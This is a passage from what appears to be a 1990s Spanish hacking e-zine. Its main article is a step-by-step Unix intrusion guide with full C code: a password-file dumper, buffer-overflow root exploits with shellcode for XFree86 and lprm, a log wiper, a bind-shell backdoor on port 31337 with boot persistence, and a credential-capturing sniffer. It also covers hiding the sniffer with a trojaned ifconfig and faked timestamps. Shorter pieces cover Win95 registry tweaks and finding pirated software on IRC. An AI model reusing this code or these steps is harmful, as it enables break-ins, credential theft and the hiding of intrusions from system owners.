pe±a. Normalmente esta en /etc/passwd,pero puede estar shadow, estando en- tonces lo importante en /etc/shadow. Me explico. Normalmente los sistemas linux no se preocupan por quien mira los passwords de los usuarios encriptados(por algo estan encriptados), o sea que el fichero /etc/passwd que es donde se guardan los pass es visible para todo el mundo. En cambio hay sitios donde la seguridad ya es mas necesaria y el archivo con los pass no es visible para todo el mundo, es entonces cuando se dice que esta shadow. Vamos a analizar una linea del /etc/passwd de un sistema que no este shadow: jose:x2rFys28wHAAy:503:508:Jose Manuel:/home/test:/bin/bash jose --> este es el nombre de usuario (login) x2rFys28wHAAy --> password encryptado 503 --> este es el uid del usuario 508 --> este es el grupo al que pertenece (gid) Jose Manuel --> nombre completo del usuario /home/jose --> directorio home de jose /bin/bash --> shell de jose Lo de 503 y 508 sirve para identificar al usuario y a su grupo, ya que linux por ejemplo no lo identificara por jose sino por 503, por lo tanto cualquier usuario con uid igual a 503 sera como si fuera a todos los efectos jose. El root siempre tendra el uid igual a 0. Lo que mas nos interesa es el password. Unix en general utiliza un metodo de encriptacion muy complejo,practicamente imposible de desencriptar. Como no se puede desencriptar lo que podemos hacer es coger una lista de palabras, ir en- criptandolas una a una y comparandolas con los pass encriptados, cuando haya una coincidencia ya tenemos un password. Lo he explicado de una forma un poco simple,espero que se comprenda. Hay multitud de crackeadores de password en la red, pero esta visto que john the ripper es el mas rapido, asi que recomiendo este. Ademas,trae una opcion que permite crackear sin lista de palabras, utili- zando pass que deriven del login del usuario. Por ejemplo si el login es pepe, pues utiliza como pass pepe1,pepe95...etc. Este es un metodo muy bueno y casi siempre pilla bastantes password. Se utiliza con "john -single ficherodepass". La forma de bajarse el fichero de passwd puede ser por ftp por ejemplo, pero antes recomiendo hacer una copia del fichero a tu directorio home con un nombre menos sospechoso,asi en los logs nos constara de que te has bajado el /etc/passwd. Lo que pasa es que hay veces en los que conseguir el fichero de pass no es tan sencillo.Puede estar shadow por ejemplo,o no tener acceso al directorio donde se encuentre. Si el fichero esta shadow, en /etc/passwd las lineas seran algo como: "jose:x:503:508:Jose Manuel:/home/test:/bin/bash". Entonces lo que falta, el pass, se encuentra encriptado en /etc/shadow,pero con permisos solo de lec- tura y escritura para el root,de forma que nosotros no podremos leerlo. Menos mal que hay formas de conseguirlo igualmente :). Como por ejemplo con varias llamadas a getpwent. El fichero que pongo ahora sirve para los dos casos,que no tengamos acceso al directorio o al /etc/passwd,o que este shadow. --------- comienzo ------------ #include <stdio.h> #include <pwd.h> struct passwd *pw; main() { while ((pw = getpwent()) != NULL) { printf("%s:",pw->pw_name); printf("%s:",pw->pw_passwd); printf("%d:",pw->pw_uid); printf("%d:",pw->pw_gid); printf("%s:",pw->pw_gecos); printf("%s:",pw->pw_dir); printf("%s\n",pw->pw_shell); } endpwent(); } ---------- final ------------ Al ejecutarlo os mostrara el fichero de contrase±as completo, por lo que es necesario redireccionar su salida a un fichero con >. Ej: "./conseguirpass > fichero". Luego te lo bajas por ftp. 3.- CONSEGUIR ACCESO DE ROOT ********************************** Una vez que tienes una cuenta lo siguiente es conseguir acceso como root. Re- cuerdo que root es el administrador del sistema y que tiene permiso para hacer TODO. Antes de intentar hacer nada recomiendo que hagais un "who" para ver si el root esta conectado, ya que si haceis cosas raras y esta delante del ordenata pues a lo mejor se mosquea y tal :). Por cierto, que si son las 10 de la noche y en el who pone que lleva conectado desde las 8 de la ma±ana no le hagais mucho caso :). Aun asi recomiendo intentar hacerse con el root por la noche. Si tienes acceso fisico al ordenata,y tiene el Lilo (linux loader) instalado pues es muy sencillo. Basta con poner en el prompt al arrancar el sistema: "linux single",y te carga el linux normalmente solo que con shell de root y sin pedir ni login,ni pass,ni nada. Supongo que si en vez de "linux",lo tie- nes configurado para que arranque con la palabra "redhat" pues seria "redhat single". Si no tienes acceso fisico a la maquina (lo mas normal),tendras que aprovechar algun fallo (bug) de la distribucion,o un xploit. Los xploits sirven para ex- plotar los bugs del sistema (la misma palabra lo dice), ya que por ejemplo para sobreescribir un buffer no los vas a hacer tecleando desde el shell, sino que lo hace un un programita en C. Hay muchisimos bugs y exploits circulando por ahi, asi que voy a poner alguno solamente. No son de lo mas reciente pero funcionara en alguna que otra maquina. Aqui pongo uno bastante reciente que sobreescribe un buffer en el servidor de XFREE86, funciona en redhat 4.2,slackware 3.1,caldera 1.1,y creo que en la debian 1.3.1. En redhat 5.0 creo que no tira. Para que funcione, el directorio /usr/X11R6 tiene que ser accesible para todo el mundo. Te consigue un shell de root y no deja logs ni el .bash_history,ni en el wtmp,ni en nada (los ar- chivos de logs los explicare mas adelante). Por cierto,si alguien no lo sabia, los archivos en C se compilan con cc -o fichero fichero.c,siendo fichero el ejecutable y fichero.c el codigo fuente, y tienes que subir el xploit por ftp a la maquina y luego compilarlo en ella. Bueno, aqui va. --------- comienzo ---------- /* Try 2 3 4 5 for OFFSET */ #define OFFSET 2 #include <string.h> #include <unistd.h> #include <errno.h> #define LENCODE ( sizeof( Code ) ) char Code[] = "\xeb\x40\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0" "\x3f\x89\xc2\x31\xdb\xb3\x0a\x31\xc9\xcd\x80\x89\xd0\x43\x41" "\xcd\x80\x89\xd0\x43\x41\xcd\x80\x31\xc0\x89\xc3\xb0\x17\xcd" "\x80\x31\xc0\xb0\x2e\xcd\x80\x31\xc0\xb0\x0b\x89\xf3\x8d\x4e" "\x08\x8d\x56\x0c\xcd\x80\xe8\xbb\xff\xff\xff/bin/sh"; char Display[ 0x4001 + OFFSET ] = ":99999", *ptr = Display + OFFSET + 1; char *args[] = { "X", "-nolock", Display, NULL }; main() { printf("pHEAR - XFree86 exploit\nby mAChnHEaD <quenelle@iname.com>\n\nYou may get a root prompt now. If you don't, try different values for OFFSET.\n\n"); dup2( 0, 10 ); dup2( 1, 11 ); dup2( 2, 12 ); __asm__("movl %%esp,(%0)\n\tsubl %1,(%0)"::"b"(ptr),"n"(LENCODE+0x2000)); memcpy( ptr + 4, ptr, 0x3fc ); memset( ptr + 0x400, 0x90, 0x3c00 - LENCODE ); memcpy( ptr + 0x4000 - LENCODE, Code, LENCODE ); execve( "/usr/X11R6/bin/X", args, args + 3 ); perror( "execve" ); } ----------- final ----------- Con este se consigue root en muchos linux, pero por si acaso adjunto alguno mas. Este otro sobreescribe un buffer en /usr/bin/lprm.Se supone que rula en redhat 4.2,y tienes que modificar el #define PRINTER para que rule. No lo he probado o sea que no se lo que tienes que poner pero supongo que con #define PRINTER "/etc/printcap" funcione,o el nombre de la impresora..eso ya lo tendreis que averiguar vosotros. Bueno,pongo aqui el codigo. ---------- comienzo ----------- #include <stdio.h> #define PRINTER "-Pwhatever" static inline getesp() { __asm__(" movl %esp,%eax "); } main(int argc, char **argv) { int i,j,buffer,offset; long unsigned esp; char unsigned buf[4096]; unsigned char shellcode[]="\x89\xe1\x31\xc0\x50\x8d\x5c\x24\xf9\x83\xc4\x0c" "\x50\x53\x89\xca\xb0\x0b\xcd\x80/bin/sh"; buffer=990; offset=3000; if (argc>1)buffer=atoi(argv[1]); if (argc>2)offset=atoi(argv[2]); for (i=0;i<buffer;i++) buf[i]=0x41; /* inc ecx */ j=0; for (i=buffer;i<buffer+strlen(shellcode);i++) buf[i]=shellcode[j++]; esp=getesp()+offset; buf[i]=esp & 0xFF; buf[i+1]=(esp >> 8) & 0xFF; buf[i+2]=(esp >> 16) & 0xFF; buf[i+3]=(esp >> 24) & 0xFF; buf[i+4]=esp & 0xFF; buf[i+5]=(esp >> 8) & 0xFF; buf[i+6]=(esp >> 16) & 0xFF; buf[i+7]=(esp >> 24) & 0xFF; printf("Offset: 0x%x\n\n",esp); execl("/usr/bin/lprm","lprm",PRINTER,buf,NULL); } ---------- final ----------- Bueno, no pongo mas que sino se alarga mucho. Solo teneis que buscar por la red con la palabra clave xploit y apareceran mogollon de webs interesantes. 4.- BORRANDO NUESTRAS HUELLAS *********************************** Esto si que es importante, yo mas bien diria que es lo mas importante, ya que si no borras todas las huellas que has ido dejando (que son muchas) pueden pillarte con todas sus consecuencias. ┐ Que te pareceria que despues de todo el trabajo que te ha llevado conseguir el root te cierran el acceso por no borrar tus huellas correctamente ? Ya no digo nada si le da por denunciarte .. Los ficheros de logs varian de un linux a otro, pero mas bien varian de direc- torio, todo lo demas se mantiene. Un encargado de grabar nuestros logs es el syslog. Este es un demonio que guarda diferentes tipos de logs como los usua- rios que se conectaron,su ip,etc. Para ver exactamente que logs guarda y en que ficheros puedes hacer un "cat /etc/syslog.conf",de esta forma veras exac- tamente que es lo que hace. Normalmente los guarda en /var/log,y los mas impor- tantes son messages,secure y xferlog. Estos son ficheros de textos normales,por lo que modificarlos es muy sencillo. Messages es un poco de todo, guarda los usuarios que se conectaron,su ip,etc.,por lo que es un co±azo la verdad. Se- cure guarda solo las ips y los demonios que usaron, por ejemplo que 195.32.2.1 se conecto al ftp el 1 de mayo a las 2 de la tarde, pero no guarda los ficheros que te bajes ni nada. Y xferlog es un fichero solo del ftp,es decir guarda conexiones,ficheros que te bajaste,etc. Para borrarlo es muy sencillo. For example: tu ip es ctv23.ctv.es (bueno,tu host mejor dicho), para borrarla del /var/log/messages pues haces "grep -v ctv23 /var/log/messages > mes". Ahora en el fichero mes tienes una copia del messages pero sin las lineas en las que aparece ctv23,luego lo copias sobreescribiendo /var/log/messages. Bueno,pues asi con el xferlog y el secure. Aunque tb puedes editarlos con el vim y borrarlos manualmente claro :). Pero todavia hay mas ficheros de logs. Por ejemplo el bash guarda una copia de todos los comandos utilizados en el directorio home en un fichero llama- do .bash_history. Para evitarlo pon "unset HISTFILE" en mitad de una sesion, ya que el log se actualiza cuando cierres la conexion. Es decir,si por ejemplo te conectas y borras el .bash_history no te servira de nada,ya que los comandos los escribe cuando te desconectes del server. En cambio si pones unset HISTFILE no los escribira cuando desconectes. Otros ficheros de logs importantes son lastlog,wtmp y utmp.No estan en forma- to de texto por lo que no podras leerlos normalmente. Lastlog --> Se encuentra normalmente en /var/log/lastlog,y guarda cuando se conecto por ultima vez un usuario y desde donde. Wtmp --> Se encuentra normalmente en /var/log/wtmp, y guarda los nombres y las ips de todos los usuarios que se conectaron alguna vez a la maquina. Utmp --> Se encuentra normalmente en /var/run/utmp, y guarda los usuarios que se encuentran conectados en ese momento a la maquina. Para borrarlos hace falta un programa especial que adjunto aqui. Hay muchos y este no es de los mejores porque no borra el registro,simplemente pone las entradas a 0,con lo que un root avanzado podria mosquearse. Tb decir que al hacer un "who" busca los usuarios en el utmp,por lo que si te borras de el y cualquier usuario hace un who,incluido el root, no te vera. Sirve para que no te detecten a simple vista pero tampoco seria muy complicado encontrarte, asi que tampoco te creas invisible :). Bueno,pego aqui el codigo. --------- empieza ----------- #include <sys/types.h> #include <stdio.h> #include <unistd.h> #include <sys/file.h> #include <fcntl.h> #include <utmp.h> #include <pwd.h> #include <lastlog.h> #define WTMP_NAME "/var/log/wtmp" #define UTMP_NAME "/var/run/utmp" #define LASTLOG_NAME "/var/log/lastlog" int f; void kill_utmp(who) char *who; { struct utmp utmp_ent; if ((f=open(UTMP_NAME,O_RDWR))>=0) { while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 ) if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof( utmp_ent )); lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); write (f, &utmp_ent, sizeof (utmp_ent)); } close(f); } } void kill_wtmp(who) char *who; { struct utmp utmp_ent; long pos; pos = 1L; if ((f=open(WTMP_NAME,O_RDWR))>=0) { while(pos != -1L) { lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND); if (read (f, &utmp_ent, sizeof (struct utmp))<0) { pos = -1L; } else { if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof(struct utmp )); lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND); write (f, &utmp_ent, sizeof (utmp_ent)); pos = -1L; } else pos += 1L; } } close(f); } } void kill_lastlog(who) char *who; { struct passwd *pwd; struct lastlog newll; if ((pwd=getpwnam(who))!=NULL) { if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) { lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0); bzero((char *)&newll,sizeof( newll )); write(f, (char *)&newll, sizeof( newll )); close(f); } } else printf("%s: ?\n",who); } main(argc,argv) int argc; char *argv[]; { if (argc==2) { kill_lastlog(argv[1]); kill_wtmp(argv[1]); kill_utmp(argv[1]); printf("Zap2!\n"); } else printf("Error.\n"); } --------- final ----------- Para usarlo se usa con "./z2 nombredeusuario". 5.- DEJANDO PUERTAS TRASERAS ************************************ Bueno,y vosotros os preguntareis si siempre que os conecteis teneis que rular el xploit o el bug,borrar huellas,etc. con todo el co±azo que eso supone. Pues la respuesta es no. Lo mas comodo es instalar una "backdoor" o puerta trasera. Una puerta trasera es una manera de entrar en un sis- tema de forma que nadie se entere de que has entrado,sin logs ni rollazos, y consiguiendo el root al momento. Por supuesto para instalar una tienes que haber conseguido el root anteriormente :). Normalmente se instalan sobre- escribiendo un fichero del sistema por uno modificado,es decir,un troyano. Por ejemplo,sobreescribes el /bin/login por uno que te deje entrar con un login:pass que definas tu y sin dejar ningun log..bonito,no? :). Hay por ahi bastantes troyanos del login,pero todos tienen un defecto (o al menos yo no vi ninguno), que pasa si el passwd esta shadow? Pues por lo menos los que yo vi, no rulan. Por eso voy a poner aqui otro metodo, que consiste en crear un puerto en la maquina con un numero raro y que al hacer un telnet a ese puerto te de una shell de root sin pass y sin logs. Pongo aqui el codigo y luego lo explico. ---------- comienzo ----------- /* quick thingy... bind a shell to a socket... defaults to port 31337 */ /* code by pluvius@io.org */ /* don't forget.. when you connect to the port.. commands are like: */ /* "ls -l;" or "exit;" (don't forget the ';') */ #define PORT 31337 #include <stdio.h> #include <signal.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid; struct sockaddr_in serv_addr; struct sockaddr_in client_addr; int main () { soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (soc_des == -1) exit(-1); bzero((char *) &serv_addr, sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr = htonl(INADDR_ANY); serv_addr.sin_port = htons(PORT); soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr)); if (soc_rc != 0) exit(-1); if (fork() != 0) exit(0); setpgrp(); signal(SIGHUP, SIG_IGN); if (fork() != 0) exit(0); soc_rc = listen(soc_des, 5); if (soc_rc != 0) exit(0); while (1) { soc_len = sizeof(client_addr); soc_cli = accept(soc_des, (struct sockaddr *) &client_addr,&soc_len); if (soc_cli < 0) exit(0); cli_pid = getpid(); server_pid = fork(); if (server_pid != 0) { dup2(soc_cli,0); dup2(soc_cli,1); dup2(soc_cli,2); execl("/bin/sh","sh",(char *)0); close(soc_cli); exit(0); } close(soc_cli);}} ---------- final ---------- Este programa crea un puerto que tu le digas (lo defines en PORT), y al co- nectar con ese puerto ejecuta el /bin/sh con privilegios del que ejecuto el programa. Es decir que si lo ejecuto el root tiene privilegios de root, si lo ejecuto pepe tiene privilegios de pepe,etc. Para instalarlo tienes que compilarlo con cc -o file file.c, y luego lo instalas ejecutandolo simple- mente con ./file. Luego desde tu casa haces un "telnet maquina 31337" o el que sea y ya estas dentro. Para ejecutar comandos tienes que poner siempre ;, es decir "ls;","who;",etc. y para desconectarte hay que poner "exit;". NOTA: Al hacer un ps (no es hacer un pis,eh? :D) se vera mientras estes conectado la primera vez que lo corras. Me explico,tu pones ./file para ejecutarlo y al hacer un ps se vera,pero nada mas que desconectes ya no se vera mas,captais? O sea,genial porque el root ni se entera. Pero que pasa si el root resetea el ordenata? Pues que el programa se cierra, evidentemente. Para ello yo recomiendo copiar el programa ya compilado a /etc/rc.d/init.d/ con un nombre como stoke,o alguno que no suene raro. Luego editais el fichero /etc/rc.d/rc y en mitad del fichero para que no cante mucho le a±adis la linea /etc/rc.d/init.d/stoke. Asi si se resetea el ordenata no importa porque arrancara el programa de nuevo con privilegios de root. 6.- INSTALANDO UN SNIFFER ********************************** Un sniffer es un programa que se usa para conseguir mas password de otros sitios a partir de una maquina que ya hayas hackeado y de la que tengas el control. Es decir, una vez que eres root de un ordenata, ┐que te impide ins- talar un programa que grabe en un log el principio de las sesiones de ftp y telnet (u otros) que se abran desde esa maquina? Por ejemplo, que grabe las 10 primeras lineas de todas las sesiones de unos determinados puertos. Como es logico entre esas diez lineas iran el login y el password, por lo que po- dras conseguir cuentas de otros ordenadores facilmente, genial,no? :). Pues bien, eso es lo que hace un sniffer. Me falto decir que el sniffer solo rula si tienes el ordenador conectado en red a traves de una tarjeta ethernet. Es decir,que si consigues hackear el ordenata de un colega, no le pongas un sniffer porque (a no ser que lo tenga conectado en red,claro) no te servira de nada, igualmente que si lo intentas instalar en tu propia maquina. Ahora pongo un sniffer para linux, para que lo useis con fines didacticos :). Tienes que definir el fichero de salida, es decir donde guardara los login y lo pass, en la linea #define TCPLOG. Captura los pass de los puertos del ftp, telnet y pop.Para ejecutarlo tienes que dejarlo corriendo en background, en segundo plano. Para ello al ejecutarlo tienes que poner "./file &". Al hacer un ps se vera el sniffer solo hasta que te desconectes,luego ya no se vera ni con ps ni con top. ------- comienzo -------- #include <sys/types.h> #include <sys/socket.h> #include <sys/time.h> #include <netinet/in.h> #include <netdb.h> #include <string.h> #include <linux/if.h> #include <signal.h> #include <stdio.h> #include <arpa/inet.h> #include <linux/socket.h> #include <linux/ip.h> #include <linux/tcp.h> #include <linux/if_ether.h> int openintf(char *); int read_tcp(int); int filter(void); int print_header(void); int print_data(int, char *); char *hostlookup(unsigned long int); void clear_victim(void); void cleanup(int); struct etherpacket { struct ethhdr eth; struct iphdr ip; struct tcphdr tcp; char buff[8192]; }ep; struct { unsigned long saddr; unsigned long daddr; unsigned short sport; unsigned short dport; int bytes_read; char active; time_t start_time; } victim; struct iphdr *ip; struct tcphdr *tcp; int s; FILE *fp; #define CAPTLEN 512 #define TIMEOUT 30 #define TCPLOG ".ttg19" int openintf(char *d) { int fd; struct ifreq ifr; int s; fd=socket(AF_INET, SOCK_PACKET, htons(0x800)); if(fd < 0) { perror("cant get SOCK_PACKET socket"); exit(0); } strcpy(ifr.ifr_name, d); s=ioctl(fd, SIOCGIFFLAGS, &ifr); if(s < 0) { close(fd); perror("cant get flags"); exit(0); } ifr.ifr_flags |= IFF_PROMISC; s=ioctl(fd, SIOCSIFFLAGS, &ifr); if(s < 0) perror("cant set promiscuous mode"); return fd; } int read_tcp(int s) { int x; while(1) { x=read(s, (struct etherpacket *)&ep, sizeof(ep)); if(x > 1) { if(filter()==0) continue; x=x-54; if(x < 1) continue; return x; } } } int filter(void) { int p; p=0; if(ip->protocol != 6) return 0; if(victim.active != 0) if(victim.bytes_read > CAPTLEN) { fprintf(fp, "\n----- [CAPLEN Exceeded]\n"); clear_victim(); return 0; } if(victim.active != 0) if(time(NULL) > (victim.start_time + TIMEOUT)) { fprintf(fp, "\n----- [Timed Out]\n"); clear_victim(); return 0; } if(ntohs(tcp->dest)==21) p=1; /* ftp */ if(ntohs(tcp->dest)==23) p=1; /* telnet */ if(ntohs(tcp->dest)==110) p=1; /* pop3 */ if(ntohs(tcp->dest)==109) p=1; /* pop2 */ if(ntohs(tcp->dest)==143) p=1; /* imap2 */ if(ntohs(tcp->dest)==513) p=1; /* rlogin */ if(ntohs(tcp->dest)==106) p=1; /* poppasswd */ if(victim.active == 0) if(p == 1) if(tcp->syn == 1) { victim.saddr=ip->saddr; victim.daddr=ip->daddr; victim.active=1; victim.sport=tcp->source; victim.dport=tcp->dest; victim.bytes_read=0; victim.start_time=time(NULL); print_header(); } if(tcp->dest != victim.dport) return 0; if(tcp->source != victim.sport) return 0; if(ip->saddr != victim.saddr) return 0; if(ip->daddr != victim.daddr) return 0; if(tcp->rst == 1) { victim.active=0; alarm(0); fprintf(fp, "\n----- [RST]\n"); clear_victim(); return 0; } if(tcp->fin == 1) { victim.active=0; alarm(0); fprintf(fp, "\n----- [FIN]\n"); clear_victim(); return 0; } return 1; } int print_header(void) { fprintf(fp, "\n"); fprintf(fp, "%s => ", hostlookup(ip->saddr)); fprintf(fp, "%s [%d]\n", hostlookup(ip->daddr), ntohs(tcp->dest)); } int print_data(int datalen, char *data) { int i=0; int t=0; victim.bytes_read=victim.bytes_read+datalen; for(i=0;i != datalen;i++) { if(data[i] == 13) { fprintf(fp, "\n"); t=0; } if(isprint(data[i])) {fprintf(fp, "%c", data[i]);t++;} if(t > 75) {t=0;fprintf(fp, "\n");} } } main(int argc, char **argv) { s=openintf("eth0"); ip=(struct iphdr *)(((unsigned long)&ep.ip)-2); tcp=(struct tcphdr *)(((unsigned long)&ep.tcp)-2); signal(SIGHUP, SIG_IGN); signal(SIGINT, cleanup); signal(SIGTERM, cleanup); signal(SIGKILL, cleanup); signal(SIGQUIT, cleanup); if(argc == 2) fp=stdout; else fp=fopen(TCPLOG, "at"); if(fp == NULL) { fprintf(stderr, "cant open log\n");exit(0);} clear_victim(); for(;;) { read_tcp(s); if(victim.active != 0) print_data(htons(ip->tot_len)-sizeof(ep.ip)-sizeof(ep.tcp), ep.buff-2); fflush(fp); } } char *hostlookup(unsigned long int in) { static char blah[1024]; struct in_addr i; struct hostent *he; i.s_addr=in; he=gethostbyaddr((char *)&i, sizeof(struct in_addr),AF_INET); if(he == NULL) strcpy(blah, inet_ntoa(i)); else strcpy(blah, he->h_name); return blah; } void clear_victim(void) { victim.saddr=0; victim.daddr=0; victim.sport=0; victim.dport=0; victim.active=0; victim.bytes_read=0; victim.start_time=0; } void cleanup(int sig) { fprintf(fp, "Exiting...\n"); close(s); fclose(fp); exit(0); } -------- final --------- Pero en cambio, detectar un sniffer es muy sencillo. Con la orden "ifconfig" y fijandose si aparece la palabra PROMISC se sabe facilmente. Esto lo hace muy vulnerable, y si un root avanzado se da cuenta no tardara en encontrar el fi- chero de logs del sniffer. Por cierto, esto es importante. Un sniffer captura los login y pass de la pe±a que accede a otros ordenatas desde la maquina en la que esta instalado,pero junto con el login y pass tambien captura su ip. A eso tb le sumamos que tb pilla los pass y las ips de la gente que accede a la ma- quina del sniffer,es decir,a si mismas. ┐Pues que pasaria si habeis borrado todas las huellas del syslog,etc. y no borrais vuestra propia info del log del sniffer? Os lo imaginais,┐no? Hay que tener cuidado con eso..no os vaya a dar un disgusto :). Para resolver lo del PROMISC del ifconfig hay que instalar un troyano. Es de- cir, un fichero modificado del ifconfig. Se compila y se copia sobreescribiendo el /sbin/ifconfig. Hay varios circulando por la red, sobre todo incluidos den- tro de rootkits. En la misma pagina de este ezine (raregazz.islatortuga.com) lo teneis dentro del rootkit para linux en el apartado de bugs/utilidades. Y ya que estamos hablando de troyanos no esta de paso comentar la orden "touch",que sirve para cambiar la fecha de un archivo. Por ejemplo si metes un ifconfig con fecha de ayer el root a lo mejor se mosquea :). Para modificarle la fecha lo mejor es pillarla de otro archivo del mismo directorio. For example: en el di- rectorio /sbin hay un archivo llamado "halt",cuya linea completa es: "-rwxr-xr-x 1 root root 6564 Oct 2 1997 /sbin/halt*" En cambio la del nuevo ifconfig es: "-rwxr-xr-x 1 root root 23368 May 8 1998 /sbin/ifconfig*" Como veis,la fecha del ifconfig canta un poco. Pues poneis "touch -r /sbin/halt /sbin/ifconfig" y la nueva linea del ifconfig pasa a a ser: "-rwxr-xr-x 1 root root 23368 Oct 2 1997 /sbin/ifconfig*" Es decir, pilla la fecha de /sbin/halt y la copia a /sbin/ifconfig, asi ya no canta tanto que lo has modificado. Despues de haber sobreescrito el ifconfig por un troyano ya no aparecera lo de PROMISC, aunque hayas instalado un sni- ffer. 7.- DESPEDIDA ********************* Bueno,pues esto ha llegado a su fin. Espero que este texto os haya sido util, sobre todo a la gente que empieza. Desde aqui quiero saludar a mi madre,a mi abuela que me estara viendo .. XD. En serio, saludo a Minerva, a Pantani, y a toda la comunidad hacker hispana. Un saludo y hasta otra. Ironbox ironboxx@hotmail.com ____________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ------------------------------------------------------- -----------------Hacking WIN 95------------------------ ---------------by 12r43l Overdrive--------------------- ---------------12r@antisocial.com---------------------- ------------------------------------------------------- Bueno como todos sabemos desgraciadamente Window$ 95 es el sistema operativo para PC de mayor uso en el planeta. Por lo tanto este articulo tiene la finalidad de ayudar a optimizar tu sistema asi como de darle un poco de "estilo" ;-). -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- Comenzemos por editar el archivo msdos.sys NOTA: Recuerda que tienes que cambiar los atributos de este archivo para poder editarlo. En la seccion de Options: [Options] BootDelay = 0 Aumenta la velocidad de booteo,el mensaje "Starting Windows..." no aparece. BootMenu = 1 Despliega automaticamente el menu de arranque de WIndows 95. BootMenuDefault = 1 El numero de opcion por default. BootMenuDelay = 10 Numero de segundos que el menu de inicio es desplegado. Logo = 0 No despliega la imagen del logo de arranque de Win95. BootMulti = 1 Hace disponible un doble booteo con DOS. -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- Para Cambiar las pantallas de inicio y final de Win95 puedes abrir con cualquier editor de imagenes los archivos Logo.sys, Logow.sys y Logos.sys NOTA: No cambies el tamaño de estos. -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- Ahora vamos con algo mas divertido: El REGISTRO de Win95!. Si ya estas cansado de ese maldito icono de mi PC, lo puedes cambiar sin mucho esfuerzo. En las seccion de HKEY_CLASSES_ROOT busca el directorio CLSID dentro de este directorio hay una carpeta llamada {20D04FE0- etc...} expande esta carpeta y encontraras una seccion llamada "DefaultIcon" haz click sobre esta carpeta y haz doble click en donde dice"(Predeterminado)" y ahi pon la ruta y el nombre del icono que quieras que aparezca. Para el Icono de la papelera de reciclaje es un proceso parecido,solo que aqui tienes que cambiar 2 iconos, uno cuando la papelera esta llena y otro cuando esta vacia. Veamos... Primero vacia tu papelera despues ve hacia esta direccion. HKEY_CLASSES_ROOT/CLSID/{645FF040- etc..}/DefaultIcon Aqui hay tres opciones"(Predeterminado)","(Empty),"(Full)" igual que como cambiaste el icono de MiPC haz doble cick en estos valores y cambia la ruta y el nombre del icono de tu agrado. El valor que utilices para (Predetarminado) debe ser el mismo que tenga el valor de (Empty). NOTA. Puedes cambiar el nombre de tu papelera dando un click en la carpeta "{645FF040- etc..}" y despues doble click en "(Predeterminado)" De la misma forma puedes cambiar el icono de entorno de red que se encuentra: HKEY_CLASSES_ROOT/CLSID/{208D2C60- etc..}/DefaultIcon o Bandeja de Entrada: HKEY_CLASSES_ROOT/CLSID/{00020D75- etc..}/DefaultIcon o Microsoft Network: HKEY_CLASSES_ROOT/CLSID/{00028B00- etc..}/DefaultIcon o El catstrante Internet Explorer: HKEY_CLASSES_ROOT/CLSID/{FBF23B42- etc..}/DefaultIcon -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- Si tienes una version anterior a Win95 OSR2 puedes optimizar tu sistema de la siguiente forma: Primero edita otravez el registro y en esta direccion: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\FS Templates\Server Cambia a los siguientes valores: NameCache debe tener el valor de a9 0a 00 00 PathCAche debe tener el valor de 40 00 00 00 Ya que hayas echo estos cambios, en "Propiedades del Sistema", dentro de "Rendimiento" escoje "Sistema de archivos" y cambia el valor de "PC de escritorio" a "Servidor de red". Puedes tambien poner al maximo "Tamaño de Cache Suplementario" para aumentar el bufer de lectura para el CD-ROM. Otro paso muy recomendable es definir un archivo de memoria virtual en tu sistema, esto se hace en la seccion de Memoria Virtual y ahi escoje la opcion "Permitir especificar la configuracion de memoria virtual", asigna como minimo el el doble de memoria RAM que tengas en tu sistema y como maximo lo que quieras. Esto creara un archivo en tu disco duro con extencion .swp Si te hace falta espacio en tu dico duro puedes liberar un poco de este eliminando todos los archivos con extenxion *.chk o *.tmp, tambien te recominedo borrar los archivos *.bmp del papel tapiz de tu sistema que no ocupes, los diseños de fondo tambien los puedes eliminar asi como la combinacion de la apariencia de tu escritorio que no te gusten, un paso mas es asignarle menor espacio a la papelera de resiclaje, la cual asigna el 10% del espacio de tu disco, esto lo puedes modificar desde las propiedades de la papelera de resiclaje seleccionando la opcion "Configurando unidades independientemente" y en la pestaña donde este tu dico duro mover el cursor al espacio que quieras (lo recomendable es el 5%). Un paso mas es eliminar las cokies que se cargan en tu disco, desde Internet por lo general son archivos con extension *.txt. "Kill the System!" 12r. ____________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ^*^*^*^*^*^*^*^*^*^*^*^*^*^*^ *^ ^* *^ COMO CONSEGUIR WAREZ... ^* *^ ----------------------- ^* *^ ^* ^*^*^*^*^*^*^*^*^*^*^*^*^*^*^ WaReZ RuLeZ ~~~~~~~~~~~ Bueno primero mover vuestro culo a efnet o undernet para pillararos listas !!!! Eso listas de ftp's donde hay soft y eso claro. !!!En que canales COMO? Pues en undernet y en efnet en canales como #warezwarez y #zeraw ,etc. hay mas solo tienes que hacer un listado de canales y fijarte en el topic. Una vez dentro pues te 